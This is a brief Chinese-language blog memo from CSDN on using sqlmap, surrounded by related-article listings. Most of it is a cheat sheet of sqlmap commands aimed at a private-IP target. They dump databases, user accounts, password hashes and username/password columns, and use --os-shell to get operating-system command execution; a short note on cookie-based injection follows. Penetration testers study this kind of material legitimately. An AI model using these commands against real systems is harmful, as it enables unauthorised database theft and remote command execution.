sqlmap简要使用,非常简要

最新推荐文章于 2020-08-25 14:19:50 发布
最新推荐文章于 2020-08-25 14:19:50 发布
阅读量258 收藏
点赞数
分类专栏: 备忘防遗
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FHLZLHQ/article/details/82150509
版权

注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。

 

sqlmap.py -u "http://192.168.87.19/index.php?r=default/news/content&id=12" -p "id"    #-p注入点,检测注入点是否可用

sqlmap.py -u "http://192.168.87.19/index.php" --data "r=default/news/content&id=12"    #数据并不在URL中,POST方法使用--data

sqlmap.py -u "http://192.168.87.19/index.php?r=default/news/content&id=12" --dbs    #可曝出所有数据库名称

sqlmap.py -u "http://192.168.87.19/index.php?r=default/news/content&id=12" --current-db    #web当前使用的数据库

sqlmap.py -u "http://192.168.87.19/index.php?r=default/news/content&id=12" --current-user    #web数据库使用账户

sqlmap.py -u "http://192.168.87.19/index.php?r=default/news/content&id=12" --users    #列出sql所有用户

sqlmap.py -u "http://192.168.87.19/index.php?r=default/news/content&id=12" --passwords    #数据库账户与密码

sqlmap.py -u "http://192.168.87.19/index.php?r=default/news/content&id=12" --tables    #输出所有的表

sqlmap.py -u "http://192.168.87.19/index.php?r=default/news/content&id=12" -D 【数据库名】 --tables    #-D 指定数据库名

sqlmap.py -u "http://192.168.87.19/index.php?r=default/news/content&id=12" -D 【数据库名】 -T 【表名】 --columns    #-T:指定要列出字段的表    --columns 列出了所有的列字段

sqlmap.py -u "http://192.168.87.19/index.php?r=default/news/content&id=12" -D 【数据库名】 -T 【表名】 -C "username,realname,password" --dump    #-C :指定要爆的字段    --dump:将结果导出

 获取Webshell(前提已经上传Webshell)

sqlmap.py -u "http://192.168.87.19/index.php?r=default/news/content&id=12" -D 【数据库名】 -T 【表名】 -C "username,realname,password" --os-shell

输入物理路径

执行dir之类的命令

 

参数放入cookie中:

简言之,id放入cookie中,然后再提交;

所以sql注入需要尝试cookie,sqlmap支持cookie参数的注入检测:

 

君行路V
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLMAP基本应用详解(实战演示)
刘桂香263的博客
07-31 4701
SQLMAP自动化注入工具具有扫描、发现并利用给定的URL的SQL漏洞。
SQLMap工具-1】SQLMap简介及简单应用实例
热门推荐
m0_64378913的博客
04-27 4万+
1 SQLMap简介 SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。 注意:sqlmap只是用来检测和利用sql注入点,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。 SQLMap
渗透测试工具sqlmap基础教程
wjy397的专栏
12-16 1735
http://blog.csdn.net/zgyulongfei/article/details/41017493 版权声明:本文为博主原创文章,未经博主允许不得转载。 目录(?)[+] 转载请注明出处:http://blog.csdn.net/zgyulongfei/article/details/41017493 作者:羽龍飛  本
sqlmap简要使用方法
weixin_34004750的博客
07-08 190
仅作为备忘!!! sqlmap使用: 注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。 sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' #-u 注入点   检测注入点是否可用s...
SQLMAP使用教程
陆总的博客
08-25 793
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、
SQLMAP神器使用.pdf
01-05
以下是对SQLMap使用的一些关键知识点的详细解释: 1. **安装与环境配置**: - 首先,需要确保已安装Python 2.7版本,因为SQLMap主要支持这个版本。 - 解决Python 2.7和Python 3之间的版本冲突,避免它们互相扰...
SQLMAP使用笔记.pdf
01-25
SQLMAP 使用笔记 SQLMAP 是一个开源的渗透测试工具,用于检测和利用 SQL 注入漏洞。下面是 SQLMAP使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> ...
Sqlmap使用手册中文版
01-13
学习使用Sqlmap,除了阅读其官方文档和用户手册,还可以配合像sqli-labs这样的实验系统进行实践。用户手册详尽地介绍了Sqlmap的所有选项和开关,提供了丰富的实例,帮助用户理解和掌握如何有效使用这个工具。 当...
SqlMap使用
06-24
本文档详细介绍了SqlMap使用教程,SQL注入攻击是黑客对数据库进行攻击的常用手段之一
sqlmap使用.docx
06-28
此外,Sqlmap还提供了`--g`选项,可以进行Google dorking,搜索特定条件的URL,例如`python sqlmap.py -g "inurl:php?id="`将搜索包含此模式的URL,这在批量扫描或模糊测试中非常有用。 总之,Sqlmap是一个强大且...
SQLMAP tamper使用场景解析
Litbai_zhang
02-26 1376
sqlmap是一款人见人爱的自动化SQL渗透工具,能够以良好的引擎发现给定URL中的可注入处,并自动化的完成注入。但是由于SQL注入的影响过于广泛,致使现代程序的防护越来越严密。sqlmap/tamper是官方给出的一些绕过脚本,可以配合渗透测试人员完成更高效更高质量的测试。 本文共分为三个部分,第一部分简要对tamper进行介绍,以及为何要使用它,如何使用;第二部分给出当前最新版本(1.2.7...
SQLMAP注入教程-11种常见SQLMAP使用方法详解
dfdhxb995397的博客
08-24 4070
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 一共有11种常见SQLmap使用方法:一、SQLMAP用于Access数据库注入(1) 猜解是否能注入 ...
关于SQLMAP所有参数的学习笔记
Mi1k7ea
02-27 1万+
本文是对于学习SQLMAP参数的使用的一些笔记,不足之处很多会慢慢改进~ SQLMAP是一款开源的、用于SQL注入漏洞检测及利用的工具,它会检测动态页面中get/post参数、cookie、http头,进行数据榨取、文件系统访问和操作系统命令执行,另外还可以进行Xss漏洞检测。关于其更多的描述这里就不多说了,直接入正题,下面从参数的每个大部分的分类开始讲。 在Kali中已默认安装,其他Li
修改文件头的加密标志位修复伪加密的zip文件
君行路的博客
09-09 6689
首先,我们来了解一下zip的文件头格式: 一个zip文件有如下三个部分组成: 1.压缩源文件数据区   2.压缩源文件目录区   3.压缩源文件目录结束标志 (详解链接) 这是三个头标记,主要看第二个   压缩源文件数据区:50 4B 03 04:这是头文件标记   压缩源文件目录区: 50 4B 01 02:目录中文件文件头标记 3F 00:压缩使用的 pkware 版本  1...
使用工具自动修复zip伪加密
君行路的博客
09-09 3780
我们知道,zip伪加密可以修改文件头的方式进行修复,未免太麻烦了。。。 接下来使用ZipCenOp这个工具对伪加密的zip文件进行修复。   1.将伪加密的zip文件放到工具同一目录下:   2.在工具的目录下打开cmd,输入如下命令: java -jar ZipCenOp.jar r flag.zip回车 出现如下提示: 则说明伪加密的zip文件修复成功。 但是!这种方...
异或注入(可用于判断哪些字符被过滤)
君行路的博客
10-20 2054
mysql里异或运算符为 ^ 或者 xor xor与^区别(基于bugku多次) ^运算符会做 位异或 运算 如 1^2=3 1^2=3 xor做逻辑运算 2 xor 0 会输出2得情况,其他情况输出其他所有数据  判断过滤的方法: 在id=1后面输入 ' ^ (0)--+ ?id=1' ^ (length('union')=5)--+ 当union被过滤时1^0 输出id=1 ...
MySQL元数据库----information_schema
君行路的博客
09-27 1612
元数据库 information_schema介绍: 它会描述整个MySQL服务器有哪些数据库,每个数据有哪些表,每个表有哪些字段。 元数据库 -&gt; 数据库列表-&gt;表列表-&gt;字段列表-&gt;表内容   information_schema有哪些数据表: 查看数据库名 SCHEMATA表中的 SCHEMA_NAME 字段为所有数据库名。(select sch...
MySQL substring()函数
君行路的博客
10-08 1300
substring()/substr()的非一般用法: substring(string,position); substring(string FROM position); 以上两种用法从指定位置截取子字符串。 substring(string,position,length); substring(string FROM position FOR length); 两...
sqlmap不会使用
最新发布
04-28
下面是一些关于sqlmap使用方法和示例: 1. 扫描目标网站是否存在SQL注入漏洞[^1]: ```shell sqlmap -u "http://example.com/page.php?id=1" --dbs ``` 2. 获取数据库名称: ```shell sqlmap -u ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值